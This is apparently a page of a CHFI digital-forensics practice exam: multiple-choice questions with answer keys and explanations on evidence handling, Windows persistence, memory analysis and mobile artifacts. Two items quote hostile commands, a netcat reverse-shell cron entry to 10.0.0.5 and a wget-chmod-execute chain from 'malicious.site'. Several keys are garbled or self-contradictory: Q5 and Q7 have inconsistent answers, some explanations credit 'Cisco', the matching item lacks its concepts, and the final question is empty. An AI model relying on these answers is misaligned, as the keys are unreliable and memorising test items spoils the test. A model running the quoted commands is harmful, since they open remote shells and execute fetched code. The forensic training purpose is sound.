Computer Hacking Forensic Investigator CHFI (CHFI) — Questions 175

1000 questions total · 14pages · All types, answers revealed

Page 1 of 14

Page 2
1
MCQhard

An organization receives a legal hold notice regarding a pending lawsuit. The IT department is instructed to preserve all relevant electronically stored information (ESI). Which of the following actions must be taken FIRST?

A.Perform a full forensic analysis of all systems
B.Notify all employees to delete personal files
C.Immediately suspend any automated data deletion policies
D.Delete all emails older than 30 days to reduce storage
AnswerC

This ensures that no relevant data is automatically purged.

Why this answer

When a legal hold notice is issued, the first priority is to preserve all potentially relevant ESI by immediately suspending any automated data deletion policies (e.g., retention schedules, auto-archiving, or purge scripts). This prevents spoliation of evidence before any collection or analysis begins. Failure to do so could result in sanctions for destroying discoverable data.

Exam trap

EC-Council often tests the misconception that forensic analysis or data collection should be the immediate step, when in fact the legal hold requires first stopping any automated destruction mechanisms to preserve the current state of ESI.

How to eliminate wrong answers

Option A is wrong because a full forensic analysis is a later step in the e-discovery process, not the first action; performing it prematurely could alter data or waste resources before the scope of preservation is defined. Option B is wrong because notifying employees to delete personal files contradicts the legal hold's purpose and could be construed as intentional spoliation; employees should be instructed to preserve all potentially relevant data, not delete anything. Option D is wrong because deleting emails older than 30 days would destroy potentially relevant evidence and directly violate the duty to preserve ESI under the legal hold.

2
Multi-Selecthard

A network security analyst reviews firewall logs and identifies a high volume of outbound DNS queries to a known malicious domain from multiple internal hosts. Which THREE actions should the analyst take immediately?

Select 3 answers
A.Isolate the affected hosts from the network
B.Update antivirus signatures and run a full scan
C.Block the malicious domain at the firewall or DNS level
D.Conduct a forensic analysis of the affected hosts
E.Review DNS logs to identify other potential malicious domains
AnswersA, C, D

Isolation prevents lateral movement and further data exfiltration.

Why this answer

The high volume of DNS queries to a malicious domain indicates possible C2 communication. Immediate actions: block the domain at the firewall/DNS, isolate affected hosts to prevent further spread, and conduct a forensic investigation to understand the infection. Checking antivirus is good but not immediate; logs for later analysis are secondary.

3
Multi-Selecteasy

Which TWO of the following are common persistence mechanisms used by malware on Windows systems? (Select two.)

Select 2 answers
A.USBSTOR registry key
B.Prefetch files
C.Scheduled Tasks
D.LNK files
E.Registry Run keys (e.g., HKLM\Software\Microsoft\Windows\CurrentVersion\Run)
AnswersC, E

Correct. Tasks can be set to run malware at specific times.

Why this answer

Run keys in the registry and scheduled tasks are standard persistence techniques. Prefetch and LNK files are forensic artifacts, not persistence mechanisms. USBSTOR tracks devices.

4
MCQmedium

You are a forensic investigator responding to a security incident at a medium-sized company. The incident involved an attacker gaining unauthorized access to a Windows Server 2019 system. The server was taken offline by the IT team immediately after detection. Your task is to acquire forensic evidence from the server's hard drive. The server has a single 500 GB NTFS partition. You have a forensic workstation with a write blocker, a SATA-to-USB adapter, and a forensic imaging tool that supports both dd and EWF (E01) formats. The server is still physically in the server room, and the IT team has powered it off. You need to create a forensic image that preserves the integrity of the evidence and allows for efficient analysis. Which of the following is the most appropriate course of action?

A.Boot the server using a forensic live CD, connect an external USB drive to the server, and use 'dd' to create a raw image on the external drive.
B.Use the server's built-in backup utility to create a system state backup and copy it to a network share.
C.Remove the hard drive, connect it via a write blocker to the forensic workstation, and then use 'dd' over a network connection to send the image to a remote server.
D.Remove the hard drive, connect it via a write blocker to the forensic workstation, and create an EWF (E01) image stored locally on the forensic workstation's internal drive.
AnswerD

This method uses a write blocker to preserve integrity, and EWF format provides compression and metadata for efficient analysis.

Why this answer

Option D is correct because it follows best practices for forensic acquisition: removing the hard drive and connecting it via a write blocker ensures that no data is altered during imaging. Using EWF (E01) format provides compression, metadata, and integrity checks (e.g., CRC32, MD5, SHA-1), which are essential for efficient analysis and evidence preservation. Storing the image locally on the forensic workstation avoids network latency and potential data corruption.

Exam trap

EC-Council often tests the misconception that using a forensic live CD is sufficient for write protection, but without a hardware write blocker, the OS may still write to the drive (e.g., via journaling or mount operations), compromising evidence integrity.

How to eliminate wrong answers

Option A is wrong because booting the server with a forensic live CD and using dd to an external USB drive risks modifying the system's volatile data and does not guarantee write-blocking at the hardware level; the live CD's kernel may still write to the internal drive. Option B is wrong because a system state backup is not a forensic image; it captures only system files and registry, not the entire partition, and it modifies the original drive during the backup process. Option C is wrong because using dd over a network connection introduces potential data integrity issues due to network latency, packet loss, or interception, and it is less efficient than local storage; the image should be stored on a trusted forensic workstation drive.

5
Multi-Selectmedium

Which TWO of the following are features of the NTFS file system that can be used to hide data? (Select TWO.)

Select 2 answers
A.Master File Table (MFT)
B.Host Protected Area (HPA)
C.$Recycle.bin
D.Alternate Data Streams (ADS)
E.Volume Shadow Copy
AnswersC, D

The $Recycle.bin folder is hidden and can be used to conceal files, though it's intended for deleted items.

Why this answer

NTFS offers two key features for hiding data: Alternate Data Streams (ADS) allow attaching hidden data to files, and the USN Journal (while not primarily for hiding) can be manipulated to hide changes. However, USN Journal is more of a forensic artifact than a hiding technique. The best answers are ADS and the $Recycle.bin (which can be used to hide files).

For this question, focus on ADS and HPA (Host Protected Area) is not NTFS-specific but can be used on NTFS drives. However, HPA is a disk-level feature, not NTFS-specific. The intended correct answers are Alternate Data Streams and the $Recycle.bin (which is a hidden folder).

6
MCQhard

An analyst runs 'regshot' before and after executing a suspicious binary. The report shows that the binary added a value to HKLM\SYSTEM\CurrentControlSet\Services\MyService with 'ImagePath' pointing to C:\Windows\system32\malware.exe and 'Start' set to 2. What is the MOST likely purpose?

A.Hiding network connections
B.Encrypting files
C.Disabling a legitimate service
D.Persistence as a service
AnswerD

Setting Start=2 means the service starts automatically at boot, ensuring persistence.

Why this answer

The binary added a service entry under HKLM\SYSTEM\CurrentControlSet\Services\MyService with 'ImagePath' pointing to malware.exe and 'Start' set to 2 (SERVICE_AUTO_START). This ensures the malware launches automatically at system boot, which is a classic persistence mechanism. The 'Start' value of 2 specifically configures the service to start automatically, making it persist across reboots.

Exam trap

EC-Council often tests the distinction between creating a new service for persistence versus modifying an existing service's startup type or disabling it, and candidates may confuse the 'Start' value of 2 (auto-start) with a disabled state (value 4).

How to eliminate wrong answers

Option A is wrong because hiding network connections is typically achieved by rootkits, API hooking, or manipulating network stack components (e.g., NDIS drivers), not by simply adding a service entry. Option B is wrong because encrypting files is a ransomware behavior that would involve file system operations or cryptographic API calls, not merely creating a service with an ImagePath. Option C is wrong because disabling a legitimate service would involve modifying the 'Start' value of an existing service (e.g., setting it to 4 for disabled) or deleting it, not creating a new service with a malicious ImagePath.

7
MCQhard

An investigator is analyzing a memory dump from a compromised server using Volatility. The 'pslist' plugin shows a process with no parent PID (PPID). Which of the following is the most likely explanation?

A.The process is a system idle process
B.The process is a kernel thread and has no parent
C.The process list is incomplete due to memory corruption
D.The process is a rootkit that has unlinked itself from the process list
AnswerB, D

Correct: Kernel threads may not have a parent process in the userland process list.

Why this answer

In Volatility, pslist may show processes without a parent if the parent process has exited or the process list is corrupted. However, a more common forensic scenario is that the process is a kernel-mode rootkit hiding its parent.

8
Multi-Selectmedium

Which TWO of the following are file systems that use journaling to maintain integrity?

Select 2 answers
A.NTFS
B.FAT32
C.ext4
D.HFS+
E.APFS
AnswersA, C

NTFS uses a log file for journaling.

Why this answer

NTFS and ext4 both use journaling. FAT32 does not; APFS uses a copy-on-write mechanism but is also journal-like; HFS+ has journaling but the question may expect ext4. However, NTFS and ext4 are clear examples.

9
MCQeasy

You are a forensic analyst in a corporate lab. A compromised server was taken offline and brought to the lab. The server runs Windows Server 2019 with a RAID 5 array of three 1TB SATA drives. The drives are hot-swappable. The server was shut down properly before removal. The lab has a forensic workstation with write-blockers, a hardware RAID controller, and imaging software. The analyst needs to acquire a forensic image of the RAID array. What is the correct course of action?

A.Reconstruct the RAID array using the same controller model in the lab, then image the logical volume via a write-blocker
B.Send the drives to a vendor for specialized RAID recovery
C.Image each drive individually using a write-blocker and then combine the images in software
D.Connect all drives to the forensic workstation and use a software RAID tool to assemble the array
AnswerA

This preserves the logical structure and ensures integrity.

Why this answer

Option A is correct because the RAID 5 array must be reconstructed using the same controller model (or an identical one) to correctly interpret the parity and striping metadata. Imaging the logical volume via a write-blocker preserves the integrity of the file system and ensures a forensically sound acquisition of the live data, which is the standard practice when the controller is available and the array is intact.

Exam trap

The trap here is that candidates often assume imaging individual drives and software reconstruction is acceptable, but the CHFI exam emphasizes that hardware RAID controllers require identical hardware to preserve the array’s logical structure and forensic integrity.

How to eliminate wrong answers

Option B is wrong because sending the drives to a vendor for specialized RAID recovery is unnecessary and costly when the array is intact and the same controller model is available in the lab; this approach is reserved for physically damaged or corrupted arrays. Option C is wrong because imaging each drive individually and combining them in software is unreliable for RAID 5, as the software may not correctly reconstruct the parity and stripe order without the exact controller metadata, potentially leading to data corruption or incomplete acquisition. Option D is wrong because connecting all drives directly to the forensic workstation and using a software RAID tool risks altering the array metadata or causing the OS to auto-assemble the array, which could modify data and violate forensic integrity; a hardware controller with a write-blocker is required to maintain a read-only acquisition.

10
MCQmedium

During an iOS forensic examination, an analyst extracts the iTunes backup of a suspect iPhone. The analyst wants to review deleted SMS messages. Which SQLite database file should be examined?

A.AddressBook.db
B.Keyboard.db
C.SMS.db
D.call_history.db
AnswerC

SMS.db is the database containing SMS and iMessage conversations, including deleted entries (until overwritten).

Why this answer

In iOS forensics, deleted SMS messages are stored in the SMS.db SQLite database located within the iTunes backup. This database contains the `message` table, which retains deleted messages until overwritten by new data, making it the primary target for recovering deleted iMessages and SMS texts.

Exam trap

EC-Council often tests the misconception that deleted SMS messages are stored in a separate 'deleted items' database or that call_history.db contains SMS data, leading candidates to overlook the primary SMS.db file.

How to eliminate wrong answers

Option A is wrong because AddressBook.db stores contact information (names, phone numbers, emails), not SMS message content. Option B is wrong because Keyboard.db stores keyboard usage data (e.g., learned words, autocorrect entries), not SMS messages. Option D is wrong because call_history.db contains call logs (incoming, outgoing, missed calls), not SMS text messages.

11
Multi-Selecthard

A malware analyst is performing dynamic analysis of a trojan. Which THREE of the following tools are commonly used to monitor system changes during execution?

Select 3 answers
A.Process Monitor
B.Ghidra
C.PEiD
D.Regshot
E.Process Explorer
AnswersA, D, E

Captures registry, file system, and process activity in real time.

Why this answer

Process Monitor (A) is correct because it is a real-time system monitoring tool that captures file system, registry, and process/thread activity, allowing analysts to observe changes made by a trojan during execution. It uses kernel-mode drivers to log operations such as CreateFile, RegSetValue, and CreateProcess, which are essential for dynamic analysis.

Exam trap

EC-Council often tests the distinction between static and dynamic analysis tools, so the trap here is that candidates confuse tools like Ghidra or PEiD (static) with runtime monitoring tools like Process Monitor or Regshot (dynamic).

12
MCQmedium

An examiner is analyzing an SSD and notices that TRIM is enabled. Why does TRIM pose a challenge for digital forensics?

A.TRIM increases the wear leveling, which reduces the lifespan of the SSD
B.TRIM encrypts the deleted data, making it inaccessible without the key
C.TRIM compresses data, altering the original content
D.TRIM causes the SSD to physically overwrite deleted data with zeros, preventing recovery
AnswerD

TRIM instructs the SSD to erase blocks, making data unrecoverable.

Why this answer

TRIM allows the SSD to erase data blocks that are no longer in use, making it difficult to recover deleted files because the data is physically erased by the SSD's garbage collection.

13
MCQmedium

A Linux system is suspected of being used as a pivot point. An analyst checks /proc/[pid]/fd/ and sees open file descriptors pointing to sockets. Which command would BEST determine the remote connections associated with these sockets?

A.netstat -anp
B.cat /proc/net/tcp
C.ls -la /proc/[pid]/fd/
D.lsof -i
AnswerD

lsof -i lists open network files with remote addresses.

Why this answer

lsof -i shows network connections and listening sockets, including remote addresses. It can read /proc fd info.

14
MCQhard

During malware analysis, an analyst discovers that a sample uses a technique to modify its own code at runtime to evade signature detection. Which anti-forensic technique does this describe?

A.Log wiping
B.Packing/Obfuscation
C.Encryption
D.Timestomping
AnswerB

Packing and obfuscation techniques modify the code to evade detection; self-modifying code is a form of obfuscation.

Why this answer

The technique of modifying code at runtime to evade signature detection is known as packing or obfuscation. Packers compress or encrypt the original executable and wrap it with a small stub that decompresses or decrypts the code in memory during execution, thereby altering the static file signature. This runtime modification allows the malware to bypass signature-based antivirus and forensic tools that rely on static analysis of the binary on disk.

Exam trap

Cisco often tests the distinction between encryption as a general concept and packing/obfuscation as a specific anti-forensic technique that combines encryption with runtime code modification to evade static signature detection.

How to eliminate wrong answers

Option A is wrong because log wiping refers to the deliberate deletion or alteration of system, application, or security logs (e.g., clearing Windows Event Logs or /var/log/messages) to cover tracks, not to modifying code at runtime. Option C is wrong because encryption, while used in packing, is a broader cryptographic concept that protects data confidentiality; the specific anti-forensic technique described here is packing/obfuscation, which combines encryption/compression with a runtime stub to alter the executable's static signature. Option D is wrong because timestomping is the act of modifying file timestamps (e.g., using SetFileTime on Windows or touch -t on Linux) to mislead timeline analysis, not modifying code at runtime.

15
Multi-Selecthard

Which THREE of the following are steps in the forensic investigation process? (Select three.)

Select 3 answers
A.Analysis
B.Sentencing
C.Reporting
D.First response
E.Deletion of irrelevant data
AnswersA, C, D

Analysis is a core step.

Why this answer

Analysis is a core phase in the forensic investigation process where collected data is examined to identify evidence, reconstruct events, and draw conclusions. This step involves techniques such as file carving, hash verification, and timeline analysis to uncover relevant artifacts from acquired images.

Exam trap

EC-Council often tests the distinction between the forensic investigation process and the broader legal or judicial process, leading candidates to mistakenly include post-investigation actions like sentencing as a forensic step.

16
MCQmedium

A security analyst arrives at a suspected computer crime scene. The computer is on and a user is logged in. The analyst needs to preserve volatile data. According to first responder duties, what should the analyst do FIRST?

A.Immediately unplug the power cord to prevent data alteration
B.Create a forensic image of the hard drive using a write blocker
C.Photograph the scene and document everything
D.Capture volatile data such as running processes and network connections
AnswerD

Volatile data must be captured before powering off because it is lost when the system loses power.

Why this answer

Option D is correct because the first responder's priority is to preserve volatile data, which is lost when the system is powered off. Volatile data includes running processes, network connections, and memory contents, which must be captured before any other action. This aligns with the order of volatility (RFC 3227) and standard forensic procedures.

Exam trap

Cisco often tests the misconception that preserving the hard drive (Option A or B) is the top priority, but the trap is that volatile data is more fragile and must be captured first to avoid losing critical evidence like active network connections or malware in memory.

How to eliminate wrong answers

Option A is wrong because immediately unplugging the power cord destroys volatile data in RAM and active network connections, violating the order of volatility. Option B is wrong because creating a forensic image of the hard drive is a non-volatile data acquisition step that should occur after volatile data capture, and using a write blocker is irrelevant for volatile data. Option C is wrong because while photographing and documenting the scene is important, it is not the first action; volatile data must be captured immediately before it is lost.

17
Multi-Selecteasy

Which TWO of the following are tools that can be used for timeline analysis in digital forensics?

Select 2 answers
A.Wireshark
B.Nmap
C.log2timeline
D.FTK Imager
E.Plaso
AnswersC, E

log2timeline is a tool for extracting timeline data from various sources.

Why this answer

log2timeline (option C) is a tool specifically designed for timeline analysis in digital forensics. It parses various log files and artifacts to create a super timeline, which is a comprehensive chronological record of system activity. This allows investigators to correlate events across multiple sources, such as file system timestamps, registry keys, and application logs.

Exam trap

EC-Council often tests the distinction between tools used for network analysis (Wireshark, Nmap) versus tools used for host-based timeline analysis (log2timeline, Plaso), leading candidates to confuse packet capture utilities with forensic timeline generators.

18
Multi-Selecthard

Which THREE of the following are considered rules of evidence that digital evidence must satisfy to be admissible in court? (Select THREE)

Select 3 answers
A.Best evidence
B.Authenticity
C.Hearsay
D.Completeness
E.Admissibility
AnswersB, D, E

Evidence must be proven to be what it claims to be.

Why this answer

Authenticity (B) is a core rule of evidence because the court must be assured that the digital evidence is exactly what it purports to be and has not been tampered with. This is typically established through cryptographic hash verification (e.g., SHA-256) and a documented chain of custody. Without authenticity, the evidence could be challenged as fabricated or altered, rendering it inadmissible.

Exam trap

EC-Council often tests the distinction between the 'best evidence rule' (which is a legal principle, not a rule of evidence that digital evidence must satisfy) and the actual three rules (authenticity, completeness, admissibility), causing candidates to mistakenly select 'Best evidence' as a required rule.

19
Multi-Selecthard

Which TWO of the following registry keys are commonly used to maintain persistence on Windows systems by automatically starting programs?

Select 2 answers
A.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
B.HKLM\SAM\SAM\Domains\Account\Users
C.HKLM\System\CurrentControlSet\Services
D.HKCU\Software\Microsoft\Windows\CurrentVersion\Run
E.HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
AnswersD, E

Programs listed here run when the current user logs on.

Why this answer

The Run key under both HKCU and HKLM is a standard autorun location. The RunOnce key also starts programs but runs them once at next logon.

20
MCQmedium

A forensic analyst is examining an iOS backup taken from a suspect's iPhone using iTunes. Which of the following SQLite databases would contain the suspect's call history?

A.AddressBook.db
B.call_history.db
C.Calendar.sqlitedb
D.SMS.db
AnswerB

call_history.db stores call logs.

Why this answer

The call history on an iOS device is stored in a SQLite database named `call_history.db` (or `call_history.db` within the root domain of the user's backup). When an iTunes backup is created, this database is included in the backup manifest and can be extracted and queried to retrieve call logs, including timestamps, durations, and phone numbers. Option B is correct because it is the specific database that contains call history records.

Exam trap

EC-Council often tests the distinction between `SMS.db` (messages) and `call_history.db` (calls), leading candidates to mistakenly choose `SMS.db` because they associate phone communication with SMS rather than call logs.

How to eliminate wrong answers

Option A is wrong because `AddressBook.db` (now `Contacts.sqlitedb` in modern iOS) stores contact information (names, phone numbers, email addresses), not call history. Option C is wrong because `Calendar.sqlitedb` stores calendar events and reminders, not call logs. Option D is wrong because `SMS.db` stores SMS and iMessage conversations, not call history records.

21
MCQmedium

A first responder arrives at a scene where a computer is suspected to contain evidence of fraud. The computer is turned on and a file is open. Which of the following actions should the responder AVOID?

A.Photographing the screen and documenting open windows.
B.Double-clicking the open file to fully view its contents.
C.Noting the time and date from the system clock.
D.Using a hardware write blocker to image the hard drive after shutdown.
AnswerB

Double-clicking alters the file's metadata and potentially the file itself.

Why this answer

Double-clicking files changes file access times and may modify data, which should be avoided to preserve evidence integrity.

22
MCQmedium

During a forensic investigation of a compromised Linux server, an analyst checks /var/log/auth.log and finds multiple entries like "Failed password for root from 10.0.0.5 port 22 ssh2". Which tool is BEST suited to analyze the timeline of these events?

A.Nmap
B.Wireshark
C.log2timeline
D.Autopsy
AnswerC

log2timeline is the standard tool for creating super timelines from log files.

Why this answer

log2timeline (part of Plaso) is designed for timeline analysis of log files, including auth.log. It parses and correlates timestamps.

23
MCQhard

A forensic analyst is examining a malware sample that uses packing to obfuscate its code. Which static analysis tool is BEST suited to identify the packer used and potentially unpack the executable?

A.PEiD
B.Cuckoo Sandbox
C.Ghidra
D.IDA Pro
AnswerA

PEiD uses signatures to detect packers, cryptors, and compilers. It can also assist in unpacking by identifying the entry point.

Why this answer

PEiD (Portable Executable Identifier) is specifically designed to detect packers, cryptors, and compilers used in PE files by scanning for known signatures in the executable's entry point. It is the best static analysis tool for identifying the packer and can often unpack the executable using its built-in generic unpacker or by invoking the packer's own unpacking stub. This makes it ideal for the initial triage of packed malware samples.

Exam trap

EC-Council often tests the distinction between static and dynamic analysis tools, and the trap here is that candidates may confuse a dynamic analysis sandbox (Cuckoo) or a general-purpose disassembler (Ghidra, IDA Pro) with a specialized static packer identifier like PEiD.

How to eliminate wrong answers

Option B is wrong because Cuckoo Sandbox is a dynamic analysis tool that executes the malware in a controlled environment to observe behavior, not a static analysis tool for identifying packers. Option C is wrong because Ghidra is a reverse engineering framework focused on disassembly and decompilation, but it lacks a dedicated packer signature database and automated unpacking capabilities like PEiD. Option D is wrong because IDA Pro is a powerful interactive disassembler and debugger, but it does not have a built-in packer identification database; while plugins can add this functionality, it is not the best-suited tool out of the box for this specific task.

24
Multi-Selectmedium

A forensic analyst is examining a Mac system for evidence of malicious activity. Which THREE artifacts are commonly analyzed in macOS forensics?

Select 3 answers
A.Prefetch files
B.bash_history
C.Unified logging
D.FSEvents
E..plist files
AnswersC, D, E

Unified logging captures system and application logs in a centralized database.

Why this answer

macOS forensics frequently examines unified logs (for system events), .plist files (for configuration and application data), and FSEvents (for file system change history). bash_history is not the default for macOS (zsh is default). Prefetch files are Windows-only.

25
MCQmedium

An incident responder finds the following entry in a Linux cron job: "*/5 * * * * root nc -e /bin/sh 10.0.0.5 4444". What is the purpose of this cron job?

A.Port scan 10.0.0.5 every 5 minutes
B.Establish a reverse shell back to the attacker every 5 minutes
C.Log system activity to a remote server
D.Download malicious software from 10.0.0.5
AnswerB

The -e option executes a program (shell) and connects its I/O to the socket, giving the attacker remote access.

Why this answer

This cron job uses netcat (nc) with the -e option to execute a shell (/bin/sh) and connect back to IP 10.0.0.5 on port 4444, creating a reverse shell. It runs every 5 minutes.

26
Matchingmedium

Match each file system to its typical maximum volume size (as commonly encountered).

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

2 TB

256 TB

128 PB

1 EB

8 EB

Why these pairings

These are approximate maximum volume sizes for each file system.

27
Multi-Selectmedium

A forensic analyst is investigating a compromised Linux server running an ext4 file system. The analyst suspects the attacker deleted critical log files (e.g., /var/log/auth.log) and wants to recover them. Which TWO techniques would be MOST effective for recovering the deleted files?

Select 2 answers
A.Running `extundelete` on the partition
B.Checking the `.Trash-1000` folder
C.Using `foremost` to perform file carving based on headers and footers
D.Restoring from the `lost+found` directory
E.Executing `dd if=/dev/sda1 of=image.dd` and analyzing with `strings`
AnswersA, C

extundelete can recover deleted files from ext3/ext4 by parsing the journal.

Why this answer

For ext4, deleted file recovery can be achieved by scanning the journal for recent file metadata, or by carving the raw disk for file signatures. The inode pointers are cleared upon deletion, but journal may contain recent records.

28
MCQmedium

An investigator examines an email header and sees the following: 'DKIM-Signature: v=1; a=rsa-sha256; d=example.com; s=selector1; bh=...; h=...; b=...'. The email claims to be from 'support@example.com', but the DKIM signature validation fails. Which of the following is the MOST likely cause?

A.The DKIM signature is optional and can be ignored.
B.The email was sent from a different domain but the From header was spoofed.
C.The recipient's email server does not support DKIM.
D.The email was encrypted and cannot be verified.
AnswerB

DKIM signature failure indicates the email was not signed by the claimed domain's private key, suggesting the From address may be spoofed.

Why this answer

DKIM uses a digital signature to verify the email's domain. Validation failure strongly suggests the email was not sent by the legitimate domain, indicating spoofing.

29
MCQmedium

During a forensic examination of a Windows system, an analyst runs the Volatility plugin `netscan` on a memory dump. What information does this plugin primarily provide?

A.Network connections and listening sockets with associated processes
B.Open files and handles for each process
C.List of all running processes and their parent processes
D.The contents of the Windows firewall rules
AnswerA

Correct. netscan scans for network artifacts.

Why this answer

netscan enumerates network connections (TCP and UDP) and listening sockets from the memory dump, including state, local/remote addresses, and owning process.

30
MCQmedium

A forensic examiner needs to verify the integrity of a forensic image after acquisition. Which of the following methods is the MOST reliable for ensuring the image has not been altered?

A.Opening the image in a hex editor and visually inspecting the first few bytes.
B.Using the 'dir' command to list files and compare timestamps.
C.Calculating and comparing hash values (e.g., MD5 or SHA-1) of the original and the image.
D.Comparing file sizes of the original drive and the image.
AnswerC

Hash comparison ensures that the image is bit-for-bit identical to the original.

Why this answer

Option C is correct because cryptographic hash functions like MD5 or SHA-1 produce a fixed-size digest that is uniquely tied to the data content. By comparing the hash of the original drive (or its bit-for-bit copy) with the hash of the forensic image, any single bit change in the image will result in a completely different hash value, providing mathematically strong integrity verification. This is the standard method recommended in forensic best practices (e.g., NIST SP 800-86) and is far more reliable than any metadata or size comparison.

Exam trap

Cisco often tests the misconception that file metadata or size comparisons are sufficient for integrity verification, when in fact only cryptographic hashing provides content-level assurance against tampering.

How to eliminate wrong answers

Option A is wrong because visually inspecting the first few bytes in a hex editor only checks a tiny fraction of the data; any alteration elsewhere in the image would go undetected. Option B is wrong because the 'dir' command lists file metadata (names, timestamps, sizes) from the filesystem, which does not verify the underlying raw data integrity; timestamps can be modified without changing the actual file content, and the command does not examine unallocated space or slack space. Option D is wrong because comparing file sizes only ensures the total byte count matches; an attacker could replace data with different content of the same size (e.g., swapping files or padding data) without changing the size, so size alone provides no cryptographic assurance.

31
MCQeasy

A security analyst is investigating a compromised Windows server and wants to capture the contents of RAM for analysis. Which of the following tools is specifically designed for this purpose?

A.Foremost
B.WinPmem
C.Volatility
D.FTK Imager
AnswerB

Correct. WinPmem is a dedicated memory acquisition tool for Windows.

Why this answer

WinPmem is a memory acquisition tool for Windows, part of the Rekall project, used to dump physical memory.

32
MCQmedium

An investigator examining a compromised web server finds a file named shell.aspx in the uploads directory. The file contains code that accepts commands via HTTP POST and executes them on the server. What is the MOST likely type of attack?

A.Server-side request forgery (SSRF)
B.SQL injection
C.Webshell
D.Cross-site request forgery (CSRF)
AnswerC

A webshell allows remote command execution via a script file placed on the server.

Why this answer

A file that accepts and executes commands remotely is a webshell, often placed via file upload vulnerabilities to maintain access.

33
MCQmedium

During a forensic investigation of a compromised Linux server, the investigator examines the bash_history file of the root user. She finds the command: wget http://malicious.site/shell.sh && chmod +x shell.sh && ./shell.sh. What is the MOST likely intent of this command sequence?

A.Download and execute a web shell for persistent remote access
B.Compile a kernel module
C.Update the system packages
D.Perform a system backup to a remote server
AnswerA

This sequence downloads a shell script and executes it, which is a common method to install a backdoor.

Why this answer

The commands download a shell script, make it executable, and run it. This is typical of a web shell download and execution, providing remote access to the attacker.

34
MCQhard

A security analyst runs the command `regshot64.exe compare` after executing malware. Regshot reports that the following registry key was created: `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SecureUpdate`. Which conclusion is MOST likely?

A.The malware encrypted the user's documents
B.The malware installed a persistence mechanism
C.The malware deleted a system file
D.The malware modified a network configuration
AnswerB

Run key = persistence.

Why this answer

The registry key `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SecureUpdate` is a standard Windows Run key, which automatically executes the specified program at user logon. By creating this key, the malware ensures it runs every time the user logs in, establishing persistence. This is a classic persistence mechanism, not an action related to encryption, file deletion, or network changes.

Exam trap

Cisco often tests the distinction between persistence mechanisms (like Run keys) and other malware behaviors (like encryption or network changes), trapping candidates who assume any registry change indicates data destruction or system modification rather than survival.

How to eliminate wrong answers

Option A is wrong because encryption of user documents would typically involve file system changes (e.g., appending .encrypted extensions) or cryptographic API calls, not the creation of a Run registry key. Option C is wrong because deleting a system file would leave evidence in file system logs or cause immediate system instability, not create a Run key for persistence. Option D is wrong because modifying a network configuration (e.g., changing DNS settings, proxy, or firewall rules) involves different registry paths (e.g., `HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters`) or netsh commands, not the user-level Run key.

35
MCQhard

A forensic analyst recovers a USB device from a suspect's computer. Which Windows registry key should be examined to determine the first time the USB device was connected?

A.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB
B.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
C.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR
D.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
AnswerC

Tracks USB storage devices and their first/last connect times.

Why this answer

The USBSTOR key records serial numbers and first/last connection times for USB storage devices.

36
MCQhard

You are investigating a suspected data exfiltration incident at a financial institution. The database is MySQL 8.0 running on Linux. The security team suspects that a user with administrative privileges exported sensitive customer records via SELECT INTO OUTFILE and then deleted the output file. The MySQL general log is enabled and located at /var/log/mysql/mysql.log. However, the log file appears to be truncated and only contains entries from the last hour. The binary log is also enabled, and the binary log files are stored in /var/lib/mysql/binlog.000001 through binlog.000005. The database is actively being used. Which of the following is the BEST course of action to recover evidence of the SELECT INTO OUTFILE command that may have occurred 3 hours ago?

A.Parse the binary log files using mysqlbinlog to extract all statements from the relevant time period
B.Analyze the general log file using grep and tail to search for SELECT INTO OUTFILE
C.Examine the InnoDB redo log files to find the SELECT INTO OUTFILE command
D.Enable MySQL audit logging and wait for the activity to reoccur
AnswerA

Binary logs contain historical SQL statements including SELECT INTO OUTFILE.

Why this answer

The binary log records all data-changing statements (including DDL and DML) and is not truncated like the general log. Since the incident occurred 3 hours ago and the general log only covers the last hour, the binary log files (binlog.000001–000005) are the only persistent record. Using mysqlbinlog to parse these files can recover the SELECT INTO OUTFILE statement from the relevant time period, even if the output file was deleted.

Exam trap

EC-Council often tests the misconception that the general log is the primary source for all SQL statements, but here the trap is that candidates overlook the binary log's persistence and time-range filtering capability, assuming only the general log can capture SELECT INTO OUTFILE.

How to eliminate wrong answers

Option B is wrong because the general log is truncated to the last hour, so it cannot contain entries from 3 hours ago; grep and tail would find nothing. Option C is wrong because InnoDB redo logs record physical changes to data pages (e.g., row modifications) and do not log SQL statements like SELECT INTO OUTFILE, which is a logical operation that writes to the filesystem, not to InnoDB tables. Option D is wrong because enabling audit logging now would only capture future activity, not the historical command that occurred 3 hours ago; it provides no retrospective evidence.

37
MCQeasy

Which Windows Event ID is generated when a service is installed on a system?

A.4624
B.7045
C.4688
D.4720
AnswerB

7045 is specifically for service installation.

Why this answer

Event ID 7045 is logged when a new service is installed on a Windows system, providing details such as service name, binary path, and account.

38
Multi-Selecthard

Which THREE of the following are indicators of malware persistence via registry run keys? (Choose three.)

Select 3 answers
A.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
B.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks
C.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
D.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
E.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
AnswersA, C, E

RunOnce keys execute programs once at next logon, used for persistence.

Why this answer

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce is a registry run key that executes programs once at user logon and then deletes the entry. Malware often uses this key to run a payload a single time, such as during initial infection or after a reboot, to establish persistence without leaving a continuous trace in the Run key.

Exam trap

EC-Council often tests the distinction between registry run keys (Run, RunOnce, RunOnceEx) and other persistence mechanisms like services (Services key) or scheduled tasks (TaskCache), tricking candidates into selecting non-run-key options that are valid persistence methods but not run keys.

39
MCQhard

